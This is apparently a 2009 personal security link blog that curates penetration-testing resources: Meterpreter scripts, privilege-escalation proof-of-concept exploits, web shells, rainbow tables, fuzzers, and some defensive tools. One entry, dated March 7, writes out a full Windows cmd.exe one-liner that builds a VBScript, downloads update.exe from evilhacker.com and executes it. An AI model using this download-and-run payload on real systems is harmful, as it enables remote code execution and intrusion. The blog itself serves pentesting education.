Mubix's Links

Wednesday, March 18, 2009

MetaSploit Meterpreter Screenshot Script

http://ethackal.com/news/metasploit-meterpreter-script-screenshot/

Monday, March 16, 2009

And we have Holograms

Yes, I know this isn't technically a hologram, but it's damn cool:
http://gl.ict.usc.edu/Research/3DDisplay/

Sunday, March 15, 2009

Penetration Testing Massive Links

This should keep you busy for a long while...

http://www.vulnerabilityasse ssment.co.uk/Penetration%20Test.html

http://penetrationtests.com/

Token Kidnapping - Privilege Escalation Win2k3 / Win2k8

Privilege Escalation or "Token Kidnapping" for -
Windows 2003: http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html
Windows 2008: http://nomoreroot.blogspot.com/2008/10/token-kidnapping-windows-2008-poc.html

Check out the other awesomeness he has on his site.

VMWorld Europe 2009 Videos

Not sure if I posted this already or not, but this guy has some awesome other videos too:
http://www.boche.net/blog/index.php/2009/03/01/vmworld-europe-2009-videos/

10 Papers Every Programmer Should Read

.. at least twice... I have read 6 of them and I certainly agree. I'll push the rest to my Kindle once it arrives.

http://blog.objectmentor.com/articles/2009/02/26/10-papers-every-programmer-should-read-at-least-twice

TuxTraining

Free online linux crash courses, blog post style:
http://tuxtraining.com/

Index of / Rootsecure.net Tutorials (pdf)

http://www.rootsecure.net/content/downloads/pdf/

Saturday, March 14, 2009

Wireless Security Tools

Stumbled across this list of Wireless tools
http://www.corecom.com/html/wlan_tools.html

SQL Injection for Oracle (pdf)

http://www.net-security.org/dl/articles/IntegrigyIntrotoSQLInjectionAttacks.pdf

Free Tools - Joshua Wright

http://willhackforsushi.com/Offensive.html

http://willhackforsushi.com/Defensive.html

Free Tools - SecureState

https://www.securestate.com/Pages/Free-Tools.aspx

Preventing SEH Overwrites

http://blogs.technet.com/srd/archive/2009/02/02/preventing-the-exploitation-of-seh-overwrites-with-sehop.aspx

The "Ultimate" list of Fuzzers

Doesn't seem very "Ultimate" but its a good list:
http://www.infosecinstitute.com/blog/2005/12/fuzzers-ultimate-list.html

c99madshell.php

You figure out what it is: http://www.derekfountain.org/security_c99madshell.php

Active Man in the Middle Attack

A presentation by Adi Sharabani from IBM on MITM:
http://blog.watchfire.com/wfblog/2009/02/active-man-in-the-middle-attacks.html

Friday, March 13, 2009

Social Engineering Webcast

Chris Nickerson and Mike Murray put on a good webinar about Social Engineering. Check out the recording and slide deck here:
http://www.ethicalhacker.net/content/view/242/2/

Wednesday, March 11, 2009

On twitter I post a long shell command that would boot/kick off a system every other user. @marcinw made it shorter and I submitted it to Shell-fu.org. Today they posted it live. Here is the link:
http://www.shell-fu.org/lister.php?id=558

Tuesday, March 10, 2009

HTML to PDF

The site just just as it says. Has a ton of applications, but the one I'm interested in at the moment, is using to to throw things on my Kindle for later reading.
http://www.html-pdf-converter.com/

Abusing Citrix - Part 1

An old hack that still works. Awesome:
http://synjunkie.blogspot.com/2009/03/abusing-citrix-part-1.html

PHP Shell Injection through PHP Log Parsing

http://securitytube.net/PHP-Shell-Injection-on-a-Website-through-Log-Poisoning-video.aspx

Monday, March 9, 2009

Public Rainbow-Tables

Oldie but a goodie that you just might not know about:
http://www.plain-text.info

Saturday, March 7, 2009

One LONG line wget for windows

"cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\getnrun.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\getnrun.vbs & echo Dim BinaryStream >> C:\windows\getnrun.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\getnrun.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\getnrun.vbs & echo BinaryStream.Open >> C:\windows\getnrun.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\getnrun.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\getnrun.vbs & echo Function BinaryGetURL(URL) >> C:\windows\getnrun.vbs & echo Dim Http >> C:\windows\getnrun.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\getnrun.vbs & echo Http.Open "GET", URL, False >> C:\windows\getnrun.vbs & echo Http.Send >> C:\windows\getnrun.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\getnrun.vbs & echo End Function >> C:\windows\getnrun.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\getnrun.vbs & echo shell.Run "C:\update.exe" >> C:\windows\getnrun.vbs & start C:\windows\getnrun.vbs http://evilhacker.com/update.exe C:\update.exe"

Friday, March 6, 2009

Fact/Fiction Book by Jayson Street

Check out the site for some sneak peeks into the Fact/Fiction book coming out BH USA / DefCon timeframe!
The Story is F1ct10n The threats are real.

Thursday, March 5, 2009

Developer Cheet Sheets galore

A bunch of programming cheet sheets. Why post it here? Because those SQL, BATCH, and Bash cheet sheets come in mighty handy during pentests:
http://www.fuzzyopinions.com/article/technology/the-developer-cheat-sheet-compilation

Defcon 16 Videos and Audio

All of the video and audio uploads were completed:
https://media.defcon.org/

Warvox 1.0.0 Official Release

http://warvox.org/

Flash and Javascript Evaluater

This a pretty awesome service, still in alpha so play nice:
http://wepawet.iseclab.org/index.php

They have examples that you can check out if you don't have anything on hand to throw at it.

Running WMIC from Meterpreter or Netcat command shell

http://darkoperator.blogspot.com/2009/03/running-wmic-in-command-shell.html

Mod_Rewrite Mastery

http://www.askapache.com/htaccess/mod_rewrite-tips-and-tricks.html

Saturday, February 28, 2009

L0phtCrack 6 To Be Released At SOURCE Boston 2009

L0phtCrack is back! At a special information session at SOURCE Boston (Thursday, 10:15am), the team that brought you L0phtCrack will be releasing version 6 of the highly-acclaimed Windows password auditing tool. Expect www.l0phtcrack.com to go live soon! See you at SOURCE!

read more | digg story

L0phtCrack Lives!

http://www.l0phtcrack.com/

If you are going to SOURCE Boston, you get a front row ticket to this ride. I hate you all...

VMMap is a process virtual and physical memory analysis utility. It shows a breakdown of a process's committed virtual memory types as well as the amount of physical memory (working set) assigned by the operating system to those types. Besides graphical representations of memory usage, VMMap also shows summary information and a detailed process memory map. Powerful filtering and refresh capabilities allow you to identify the sources of process memory usage and the memory cost of application features.
Besides flexible views for analyzing live processes, VMMap supports the export of data in multiple forms, including a native format that preserves all the information so that you can load back in. It also includes command-line options that enable scripting scenarios.
VMMap is the ideal tool for developers wanting to understand and optimize their application's memory resource usage.

http://technet.microsoft.com/en-us/sysinternals/dd535533.aspx

McFeters lives again! nsearch ImmunityDbg searching script

Nate posts about a memory searching script for ImmunityDbg

http://natemcfeters.blogspot.com/2009/02/nsearch-new-immunitydbg-searching.html

Thursday, February 19, 2009

Packets and Logs from ShmooCon

Tenable's assessment of what happened at Shmoo:
http://blog.tenablesecurity.com/2009/02/packets-and-logs-found-on-the-shmoocon-network.html

InfoSec Magazine - Feb

Ok ok, so I'm posting this because an Ad for the Academy made it into a full page (35). But it's cool because a good friend of mine was the actual designer of the page.
http://searchsecurity.techtarget.com/magOnline/0,,sid14_gci1347059,00.html

Tuesday, February 17, 2009

Command Line / Shell Fu Part Deux

Paul Asadoorian and Byte_Bucket have started a blog about cool command line tricks here:
http://blog.commandlinekungfu.com/

Command Line / Shell Fu

Some links to answer "now what" after you popped shell.

Shell Fu:
http://www.shell-fu.org/

Command Line Fu:
http://www.commandlinefu.com/

Ed Skoudis released 3 cheat sheets:
http://www.inguardians.com/pubs/articles.html

Monday, February 16, 2009

RainbowCrack 1.3 Released

Multicore and CUDA (GPU) integration. w00t!

http://www.professionalsecuritytesters.org/modules.php?name=News&file=article&sid=1005

Friday, February 13, 2009

Valentines for all you trekkies out there

http://www.etsy.com/view_listing.php?listing_id=20121538

Cookies you didn't know you had. DELETE

http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager07.html

Thursday, February 12, 2009

JavaScript Unpacker

Awesome tool released at ShmooCon - You'll know it if you need it: http://jsunpack.jeek.org/dec/go

List of 'bad' sites and blocklists

Here is a list of known bad sites:
http://www.malwaredomainlist.com/mdl.php?inactive=&sort=IP&search=&colsearch=All&ascordesc=ASC&quantity=100&page=0

Here is my favorite blocklist site:
http://iblocklist.com/lists.php

Wednesday, February 11, 2009

BT4 USB/Persistent Changes/Nessus

A great tutorial that shows you how to get all three working with the new release of Back|Track. Remeber it is still BETA. WHICH MEANS THEY NEED FEEDBACK! - http://www.infosecramblings.com/backtrack/backtrack-4-usbpersistent-changesnessus/